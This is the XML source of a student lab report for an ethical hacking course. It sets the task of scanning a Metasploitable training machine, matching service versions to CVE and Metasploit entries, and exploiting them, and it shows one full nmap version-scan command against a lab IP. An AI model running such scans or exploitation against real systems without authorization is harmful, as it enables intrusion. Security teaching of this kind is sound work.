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5ABFEA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ETHICAL HACKING TECHNOLOGIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B813BCB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DF8EAB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc213896407"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Work 4.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metadata and vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671319A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F88C7F9" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Legend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6C6BEE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The information system is used to provide services. The network administrator has been less than diligent and has not updated services for a long time. This has made the services provided in the virtual environment vulnerable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53756672" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E80D36" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364FBCBD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Goals </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F42A4" w14:textId="6336E8C8" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Identify the services running on the network and their versions. Find vulnerabilities in existing services and exploit them (hacking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FC66E4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E042673" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Methodology for carrying out the work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1043D9A7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The work involves scanning the network and discovering service ports and their versions. Vulnerability versioning in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>http://nvd.n</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>st.gov</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability database. Vulnerability search in the Metasploit database. Vulnerability Exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1601A746" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EEF1631" w14:textId="77777777" w:rsidR="00F36CBF" w:rsidRDefault="00F36CBF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE2AB4" w14:textId="29D4AC9F" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="MAG-01"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TASKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E90712" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C1028C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428B99DD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc258656086"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Workflow. Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="009A876F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434A6020" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">During the lab, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scan ONLY ONE IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>. In the Service List table (Table 1), fill in the service information (Service, Port, etc.) for the scanned (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "http://sourceforge.net/projects/metasploitable/files/Metasploitable2/" \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Metaploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>) address. Table 2 lists the vulnerable services. It is necessary to explain why you think the service may be compromised or exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17568B50" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2B3947" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">[TO FILL] Vulnerability [First, Second, .... N] - Demonstrate (provide evidence) how it was exploited. It is recommended to use the Kali Linux Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4141FF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618D8803" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA7B3A9" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc258656087"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use of Nmap / Nessus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Vulnerabilities detected in services: Searching CVE and Metasploit databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A40254" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFA499A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Your result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE660CE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>I used the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 -A -p- 192.168.1.85 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> ip_scan.txt” to scan the opened port and services and then store this in ip_scan.txt file, so that, I don’t repeat this command again and again and don’t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>waist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> my time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08856919" w14:textId="77777777" w:rsidR="00C45EE1" w:rsidRDefault="00C45EE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341C79BB" w14:textId="28647144" w:rsidR="00970F89" w:rsidRDefault="00C45EE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45EE1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D22DF8C" wp14:editId="4E54F16F">
            <wp:extent cx="6257290" cy="3519482"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1297165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65285" name="Picture 1" descr="A screenshot of a compu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62960" cy="3522671"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4376CBEE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7A50DD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="527CFB3C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>List of services (scanned IP address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF1B8B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Table 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019068CF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="735"/>
        <w:gridCol w:w="2516"/>
        <w:gridCol w:w="1079"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1469"/>
        <w:gridCol w:w="2389"/>
      </w:tblGrid>
      <w:tr w:rsidR="00970F89" w14:paraId="25A75D5B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C11815A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Eil. No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="669C1D5B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E1F123A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(port)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="590AF4EA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1462978B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
